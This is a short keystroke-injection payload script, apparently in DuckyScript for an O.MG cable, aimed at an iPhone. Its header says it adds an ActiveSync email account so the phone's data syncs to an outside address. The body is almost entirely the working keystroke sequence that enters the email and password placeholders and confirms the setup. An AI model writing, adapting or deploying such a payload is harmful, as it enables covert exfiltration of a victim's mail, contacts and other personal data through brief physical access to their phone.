REM Version 1.0 REM OS: iOS REM Author: Peaakss REM Description: This payload adds a active sync account to icloud to sync data from a iPhone to a email address REM NOITCE Payload was made on iOS 16.1 - iPhone | Timing may have have to be changed based on version/model REM NOTICE Lighting to USB-A or USB-C camera adapter is needed to run this payload, ative end of the O.MG cable must be plugged into the end of the adapter\ REM NOTICE This Payload requires full keyboard access to be turned on REM NOTICE This payload was adding a Gmail to ative sync, the amounts of TAB and DOWN ARROWS will be diffrent with diffrent email services REM [Thanks Kalani for the idea to write a payload for AtiveSync and always inspiring me :) ] GUI h DELAY 100 GUI h GUI SPACE DELAY 500 STRING ActiveSync DELAY 150 ENTER DELAY 500 DOWN ARROW DELAY 150 SPACE REM NOTICE ''The Amount of Down arrows determines which email service is used, we will use gmail in this payload '' DELAY 150 DOWN ARROW DELAY 150 DOWN ARROW DELAY 100 SPACE DELAY 1000 STRING "EMAIL" DELAY 1000 STRING "PASSWORD" DELAY 1500 TAB DELAY 150 TAB DELAY 150 TAB DELAY 150 TAB DELAY 150 TAB DELAY 150 TAB DELAY 150 TAB DELAY 150 TAB DELAY 150 TAB DELAY 150 TAB DELAY 150 TAB DELAY 150 TAB DELAY 150 TAB DELAY 150 TAB DELAY 150 TAB DELAY 150 ENTER DELAY 1500 DOWN ARROW DELAY 150 DOWN ARROW DELAY 150 DOWN ARROW DELAY 150 SPACE DELAY 150 GUI h